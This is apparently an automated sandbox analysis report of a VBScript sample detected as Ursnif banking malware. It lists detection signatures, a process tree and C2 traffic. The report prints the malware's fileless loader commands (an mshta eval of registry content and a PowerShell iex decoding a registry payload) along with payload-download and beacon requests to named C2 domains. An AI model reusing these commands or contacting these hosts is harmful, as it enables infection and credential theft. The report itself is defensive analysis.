Loading ...

Play interactive tourEdit tour

Analysis Report 0k4Vu1eOEIhU.vbs

Overview

General Information

Sample Name:0k4Vu1eOEIhU.vbs
Analysis ID:321161
MD5:a3ba204668130312404ae877445921c1
SHA1:65f172cb351f3bf1b51b24ecf837dd1dab1731e0
SHA256:c16c0ad19dc1f015c92f3232a1eaa069b71f99695331a12a67a650c4c7bdbf75

Most interesting Screenshot:

Detection

Ursnif
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for dropped file
Benign windows process drops PE files
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Sigma detected: Dot net compiler compiles file from suspicious location
VBScript performs obfuscated calls to suspicious functions
Yara detected Ursnif
Allocates memory in foreign processes
Changes memory attributes in foreign processes to executable or writable
Compiles code for process injection (via .Net compiler)
Creates a thread in another existing process (thread injection)
Creates processes via WMI
Deletes itself after installation
Disables SPDY (HTTP compression, likely to perform web injects)
Found Tor onion address
Hooks registry keys query functions (used to hide registry keys)
Injects code into the Windows Explorer (explorer.exe)
Machine Learning detection for dropped file
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Modifies the export address table of user mode modules (user mode EAT hooks)
Modifies the import address table of user mode modules (user mode IAT hooks)
Modifies the prolog of user mode functions (user mode inline hooks)
Queries sensitive service information (via WMI, Win32_LogicalDisk, often done to detect sandboxes)
Sigma detected: MSHTA Spawning Windows Shell
Sigma detected: Suspicious Csc.exe Source File Folder
Suspicious powershell command line found
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to steal Mail credentials (via file access)
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Compiles C# or VB.Net code
Contains capabilities to detect virtual machines
Contains functionality to call native functions
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file does not import any functions
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Searches for the Microsoft Outlook file path
Sigma detected: Suspicious Rundll32 Activity
Tries to load missing DLLs
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

Startup

  • System is w10x64
  • wscript.exe (PID: 6732 cmdline: C:\Windows\System32\wscript.exe 'C:\Users\user\Desktop\0k4Vu1eOEIhU.vbs' MD5: 9A68ADD12EB50DDE7586782C3EB9FF9C)
  • iexplore.exe (PID: 6360 cmdline: 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding MD5: 6465CB92B25A7BC1DF8E01D8AC5E7596)
    • iexplore.exe (PID: 6348 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6360 CREDAT:17410 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
    • iexplore.exe (PID: 6240 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6360 CREDAT:17422 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
    • iexplore.exe (PID: 5652 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6360 CREDAT:17428 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
  • mshta.exe (PID: 6112 cmdline: 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>resizeTo(1,1);eval(new ActiveXObject('WScript.Shell').regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\Actidsrv'));if(!window.flag)close()</script>' MD5: 197FC97C6A843BEBB445C1D9C58DCBDB)
    • powershell.exe (PID: 6356 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi)) MD5: 95000560239032BC68B4C2FDFCDEF913)
      • conhost.exe (PID: 4640 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • csc.exe (PID: 4220 cmdline: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\1b1iaete\1b1iaete.cmdline' MD5: B46100977911A0C9FB1C3E5F16A5017D)
        • cvtres.exe (PID: 5336 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES3556.tmp' 'c:\Users\user\AppData\Local\Temp\1b1iaete\CSC8D8F05B01A304F97BCE9A6F7324A364.TMP' MD5: 33BB8BE0B4F547324D93D5D2725CAC3D)
      • csc.exe (PID: 6140 cmdline: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\gf33rpcq\gf33rpcq.cmdline' MD5: B46100977911A0C9FB1C3E5F16A5017D)
        • cvtres.exe (PID: 1152 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES45E1.tmp' 'c:\Users\user\AppData\Local\Temp\gf33rpcq\CSC37B7B5B8D8A1469384B4E042B687670.TMP' MD5: 33BB8BE0B4F547324D93D5D2725CAC3D)
      • explorer.exe (PID: 3388 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • cmd.exe (PID: 5884 cmdline: cmd /C 'nslookup myip.opendns.com resolver1.opendns.com > C:\Users\user\AppData\Local\Temp\A736.bi1' MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
  • control.exe (PID: 5232 cmdline: C:\Windows\system32\control.exe -h MD5: 625DAC87CB5D7D44C5CA1DA57898065F)
    • rundll32.exe (PID: 5392 cmdline: 'C:\Windows\system32\rundll32.exe' Shell32.dll,Control_RunDLL -h MD5: 73C519F050C20580F8A62C849D49215A)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000003.00000003.342326677.00000000046E0000.00000004.00000001.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
    00000003.00000003.270925261.0000000005488000.00000004.00000040.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
      00000003.00000003.271044990.0000000005488000.00000004.00000040.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
        00000003.00000003.283759695.000000000530B000.00000004.00000040.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
          00000003.00000003.270893136.0000000005488000.00000004.00000040.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
            Click to see the 14 entries

            Sigma Overview

            System Summary:

            barindex
            Sigma detected: Dot net compiler compiles file from suspicious locationShow sources
            Source: Process startedAuthor: Joe Security: Data: Command: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\1b1iaete\1b1iaete.cmdline', CommandLine: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\1b1iaete\1b1iaete.cmdline', CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi)), ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 6356, ProcessCommandLine: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\1b1iaete\1b1iaete.cmdline', ProcessId: 4220
            Sigma detected: MSHTA Spawning Windows ShellShow sources
            Source: Process startedAuthor: Michael Haag: Data: Command: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi)), CommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi)), CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>resizeTo(1,1);eval(new ActiveXObject('WScript.Shell').regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\Actidsrv'));if(!window.flag)close()</script>', ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 6112, ProcessCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi)), ProcessId: 6356
            Sigma detected: Suspicious Csc.exe Source File FolderShow sources
            Source: Process startedAuthor: Florian Roth: Data: Command: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\1b1iaete\1b1iaete.cmdline', CommandLine: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\1b1iaete\1b1iaete.cmdline', CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi)), ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 6356, ProcessCommandLine: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\1b1iaete\1b1iaete.cmdline', ProcessId: 4220
            Sigma detected: Suspicious Rundll32 ActivityShow sources
            Source: Process startedAuthor: juju4: Data: Command: 'C:\Windows\system32\rundll32.exe' Shell32.dll,Control_RunDLL -h, CommandLine: 'C:\Windows\system32\rundll32.exe' Shell32.dll,Control_RunDLL -h, CommandLine|base64offset|contains: , Image: C:\Windows\System32\rundll32.exe, NewProcessName: C:\Windows\System32\rundll32.exe, OriginalFileName: C:\Windows\System32\rundll32.exe, ParentCommandLine: C:\Windows\system32\control.exe -h, ParentImage: C:\Windows\System32\control.exe, ParentProcessId: 5232, ProcessCommandLine: 'C:\Windows\system32\rundll32.exe' Shell32.dll,Control_RunDLL -h, ProcessId: 5392

            Signature Overview

            Click to jump to signature section

            Show All Signature Results

            AV Detection:

            barindex
            Antivirus detection for dropped fileShow sources
            Source: C:\Users\user\AppData\Local\Temp\earmark.avchdAvira: detection malicious, Label: TR/Crypt.XDR.Gen
            Multi AV Scanner detection for domain / URLShow sources
            Source: c56.lepini.atVirustotal: Detection: 12%Perma Link
            Source: api3.lepini.atVirustotal: Detection: 10%Perma Link
            Source: api10.laptok.atVirustotal: Detection: 12%Perma Link
            Multi AV Scanner detection for dropped fileShow sources
            Source: C:\Users\user\AppData\Local\Temp\earmark.avchdReversingLabs: Detection: 45%
            Machine Learning detection for dropped fileShow sources
            Source: C:\Users\user\AppData\Local\Temp\earmark.avchdJoe Sandbox ML: detected
            Source: C:\Windows\explorer.exeCode function: 35_2_061037B8 FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,35_2_061037B8

            Networking:

            barindex
            Found Tor onion addressShow sources
            Source: powershell.exe, 00000015.00000003.348157353.00000267796D0000.00000004.00000001.sdmpString found in binary or memory: ADVAPI32.DLLCryptGetUserKeyKERNEL32.DLLLoadLibraryExWWS2_32.DLLWSARecvWSASendclosesocketrecvCHROME.DLLsoft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%xversion=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s&ip=%s&os=%s%u.%u_%u_%u_x%u&tor=1Mozilla/5.0 (Windows NT %u.%u%s; rv:82.0) Gecko/20100101 Firefox/82.0; Win64; x64http://https://file://USER.ID%lu.exe/upd %luCopyright (c) 2009 Microsoft Corporation.Software\AppDataLow\Software\Microsoft\MainBlockTempClientSystemIniKeysScrKillLastTaskLastConfigCrHookEdHookOpHookExec.onionTorClientTorCrc%s %s HTTP/1.1
            Source: explorer.exe, 00000023.00000002.488542478.000000000613E000.00000004.00000001.sdmpString found in binary or memory: ADVAPI32.DLLCryptGetUserKeyKERNEL32.DLLLoadLibraryExWWS2_32.DLLWSARecvWSASendclosesocketrecvCHROME.DLLsoft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%xversion=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s&ip=%s&os=%s%u.%u_%u_%u_x%u&tor=1Mozilla/5.0 (Windows NT %u.%u%s; rv:82.0) Gecko/20100101 Firefox/82.0; Win64; x64http://https://file://USER.ID%lu.exe/upd %luCopyright (c) 2009 Microsoft Corporation.Software\AppDataLow\Software\Microsoft\MainBlockTempClientSystemIniKeysScrKillLastTaskLastConfigCrHookEdHookOpHookExec.onionTorClientTorCrc%s %s HTTP/1.1
            Source: RuntimeBroker.exe, 00000025.00000002.477516114.000001FC1383E000.00000004.00000001.sdmpString found in binary or memory: ADVAPI32.DLLCryptGetUserKeyKERNEL32.DLLLoadLibraryExWWS2_32.DLLWSARecvWSASendclosesocketrecvCHROME.DLLsoft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%xversion=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s&ip=%s&os=%s%u.%u_%u_%u_x%u&tor=1Mozilla/5.0 (Windows NT %u.%u%s; rv:82.0) Gecko/20100101 Firefox/82.0; Win64; x64http://https://file://USER.ID%lu.exe/upd %luCopyright (c) 2009 Microsoft Corporation.Software\AppDataLow\Software\Microsoft\MainBlockTempClientSystemIniKeysScrKillLastTaskLastConfigCrHookEdHookOpHookExec.onionTorClientTorCrc%s %s HTTP/1.1
            Source: RuntimeBroker.exe, 00000026.00000002.473275595.000001776603E000.00000004.00000001.sdmpString found in binary or memory: ADVAPI32.DLLCryptGetUserKeyKERNEL32.DLLLoadLibraryExWWS2_32.DLLWSARecvWSASendclosesocketrecvCHROME.DLLsoft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%xversion=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s&ip=%s&os=%s%u.%u_%u_%u_x%u&tor=1Mozilla/5.0 (Windows NT %u.%u%s; rv:82.0) Gecko/20100101 Firefox/82.0; Win64; x64http://https://file://USER.ID%lu.exe/upd %luCopyright (c) 2009 Microsoft Corporation.Software\AppDataLow\Software\Microsoft\MainBlockTempClientSystemIniKeysScrKillLastTaskLastConfigCrHookEdHookOpHookExec.onionTorClientTorCrc%s %s HTTP/1.1
            Source: global trafficHTTP traffic detected: GET /jvassets/xI/t64.dat HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: c56.lepini.at
            Source: Joe Sandbox ViewIP Address: 47.241.19.44 47.241.19.44
            Source: Joe Sandbox ViewASN Name: CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC
            Source: global trafficHTTP traffic detected: GET /api1/cooJg43ouS5/K3Ruroq2OwAQ6E/PHLRSnYLIKMvpyci0z8ZP/9Q_2BHHC9u6JCJFh/DZ5YM5BLSfzDcwZ/ysqT6z8HrNKuO4fXY2/irkbAVdTo/RWbe52iH3Xq4g9HSy7T_/2BHlZ1AsqHp_2FSVhhH/PxISPyARHHBu9cqf2asVrk/B_2Bc5UErTgzq/aCeRep61/u3_2FPbPYGS0j_2BswbxUjP/8O28iXtkQz/aylOZngYJ0Xllf6WM/vy7yYAtFEJkB/5_2Baz4XbSv/er1JYCD_0A_0Dl/I8i2hrmb1zaiul1kG_2Fy/aiVGniqis6o2FPCg/GwUZMZCTuQ9eNWU/_2FZB6xpAK/f1KMxZbb/x HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: api10.laptok.atConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: api10.laptok.atConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /api1/LuBBcY4TML0KBMn/k0LnS7vOrdoo1zsr2O/8QpBkUYNS/Iitw2RlTYx6j2YDr40ho/NiKHYMDKQoBSybL2dbE/e1Tv5976X6JrtcS8e3Cau8/bHBSmERO1b1VH/Kudx_2BF/_2BL9No9vXNqb4KNHmzJd0q/QVVHYO2yKd/Gg_2Bg1xfwH_2BFEB/HY67cbpQ4ByT/WtQUYEw8lT6/2gLjoybqDfhtZw/nLvu2CTf1DWVATvmcGkIs/bnTukFEBv2W5KdSS/EOrXUbzFFEnl_0A/_0Dx52MnKqhyBqUTRM/yhl0u8uL2/TPtLJtxfkRCssV3/F2uVhvn9 HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: api10.laptok.atConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: api10.laptok.atConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /api1/iAJCYcyHod24JwK9k/jIufCEIwS17P/jhvYu_2FkkI/QBl_2BM4T097uF/L2PDj462js5JIy2DrKfuc/n67M2HaktlcaJNbk/U5tmJV6FXYX9PYl/NoP4iCo0t3EEcSsTSD/GIKj7owQS/L_2F_2FDnVHC9KBZdZNo/37VIl0kIhqLuACLVIYX/V6vuh2W221NYLx6qfGiDKK/3s1hbscFurS3Z/Dxw7EJ3l/t2p9Z6brZ2tKJpChrU45Kjr/cjfC3DPjSn/RRT9C0xUE0vR_0A_0/Dfm26RmoxVkl/LnqMa8E23Vi/NuAD37gXc5rJtP/C2npqShAXAGl_2BaAJYmK/pi0zzpwPl/ghuK HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: api10.laptok.atConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /jvassets/xI/t64.dat HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: c56.lepini.at
            Source: global trafficHTTP traffic detected: GET /api1/4hPW9kKqFHoPCbkici7/axeaBmAwInlm_2BMwjoNQF/DBqPIV6fxiDUx/O8IYQJ_2/FHfs18Nkn9y513u4F9SUOJw/kNmy8dvo70/7jCyOgfNyGln8LENF/ErRL2pQStqN1/9Qq_2BuUJKP/_2Fjcn_2BotOm5/cEi3nGid_2FTEjNr_2B_2/FztACtnep14lNaww/g259IbS6qj0nWTz/Gh1DisQwgNRag12JVP/NBztCoN0H/TGOsfxOOicoc9Giue0bG/lBoyH_2B2mbkCnKCsUn/FC1_0A_0D28OMwhi9pqja2/n506RnxvrVDkJ/nlxG9FcdJ_/2Btn0wAIu/7J2m HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:82.0) Gecko/20100101 Firefox/82.0Host: api3.lepini.at
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: <FavoriteIcon>http://www.facebook.com/favicon.ico</FavoriteIcon> equals www.facebook.com (Facebook)
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: <FavoriteIcon>http://www.myspace.com/favicon.ico</FavoriteIcon> equals www.myspace.com (Myspace)
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: <FavoriteIcon>http://www.rambler.ru/favicon.ico</FavoriteIcon> equals www.rambler.ru (Rambler)
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: <URL>http://www.facebook.com/</URL> equals www.facebook.com (Facebook)
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: <URL>http://www.rambler.ru/</URL> equals www.rambler.ru (Rambler)
            Source: unknownDNS traffic detected: queries for: api10.laptok.at
            Source: unknownHTTP traffic detected: POST /api1/6xMlZYDa3EL_2B/rfDjddDO_2BmWIu1P5dft/exMqTkz6IvD2R3CX/ZHfeDoF3fHMArbt/_2FvJp2IQ4IZi8SCWS/gz5OHLXug/fyQYX3fieMX_2FjcAjW8/hzShghlLicWrj3lQfLt/rhQSYVCKzEiMW_2FO85OZQ/XR6_2BLXNmR15/9Qh_2F4q/grWd_2FFp65v_2FIzQ3F6ge/ak2ymGZicE/UE_2FuPPw8_2BZGEv/QsAL_2Bz08MJ/CIkIoxpdM5N/NWEb4k99CP_2B5/mG4eGNV4kLLjNZpk_0A_0/DnyTv6YNSCi2606v/WegLk1STDZJMFeZ/ibnQp1hQgDMJwqC/jc HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:82.0) Gecko/20100101 Firefox/82.0Content-Length: 2Host: api3.lepini.at
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 20 Nov 2020 12:33:47 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingContent-Encoding: gzipData Raw: 36 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 40 11 1b 7d a8 34 c8 6c a0 22 28 2f 2f 3d 33 af 02 59 4e 1f 66 9a 3e d4 25 00 0b d9 61 33 92 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 6a(HML),I310Q/Qp/K&T";Ct@}4l"(//=3YNf>%a30
            Source: explorer.exe, 00000023.00000002.488959273.0000000006300000.00000002.00000001.sdmpString found in binary or memory: http://%s.com
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://amazon.fr/
            Source: {0F63312B-2B78-11EB-90E4-ECF4BB862DED}.dat.9.drString found in binary or memory: http://api10.laptok.at/api1/LuBBcY4TML0KBMn/k0LnS7vOrdoo1zsr2O/8QpBkUYNS/Iitw2RlTYx6j2YDr40ho/NiKHYM
            Source: {0F633129-2B78-11EB-90E4-ECF4BB862DED}.dat.9.dr, ~DFD893D4E6D1758C04.TMP.9.drString found in binary or memory: http://api10.laptok.at/api1/cooJg43ouS5/K3Ruroq2OwAQ6E/PHLRSnYLIKMvpyci0z8ZP/9Q_2BHHC9u6JCJFh/DZ5YM5
            Source: explorer.exe, 00000023.00000000.372681916.0000000008A1F000.00000004.00000001.sdmpString found in binary or memory: http://api10.laptok.at/api1/iAJCYcyH
            Source: RuntimeBroker.exe, 00000026.00000002.472576005.0000017764860000.00000002.00000001.sdmpString found in binary or memory: http://api10.laptok.at/api1/iAJCYcyHod24JwK9k/jIufCEIwS17P/jhvYu_2FkkI/QBl_2BM4T097uF/L2PDj462j
            Source: {15B14822-2B78-11EB-90E4-ECF4BB862DED}.dat.9.drString found in binary or memory: http://api10.laptok.at/api1/iAJCYcyHod24JwK9k/jIufCEIwS17P/jhvYu_2FkkI/QBl_2BM4T097uF/L2PDj462js5JIy
            Source: explorer.exe, 00000023.00000002.472481420.0000000001464000.00000004.00000020.sdmpString found in binary or memory: http://api3.lepini.at/api1/6xMlZYDa3EL_2B/rfDjddDO_2BmWIu1P5dft/exMqTkz6IvD2R3CX/ZHfeDoF3fHMArbt/_2F
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://ariadna.elmundo.es/
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://ariadna.elmundo.es/favicon.ico
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://arianna.libero.it/
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://arianna.libero.it/favicon.ico
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://asp.usatoday.com/
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://asp.usatoday.com/favicon.ico
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://auone.jp/favicon.ico
            Source: explorer.exe, 00000023.00000002.488959273.0000000006300000.00000002.00000001.sdmpString found in binary or memory: http://auto.search.msn.com/response.asp?MT=
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://br.search.yahoo.com/
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://browse.guardian.co.uk/
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://browse.guardian.co.uk/favicon.ico
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://busca.buscape.com.br/
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://busca.buscape.com.br/favicon.ico
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://busca.estadao.com.br/favicon.ico
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://busca.igbusca.com.br/
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://busca.igbusca.com.br//app/static/images/favicon.ico
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://busca.orange.es/
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://busca.uol.com.br/
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://busca.uol.com.br/favicon.ico
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://buscador.lycos.es/
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://buscador.terra.com.br/
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://buscador.terra.com/
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://buscador.terra.com/favicon.ico
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://buscador.terra.es/
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://buscar.ozu.es/
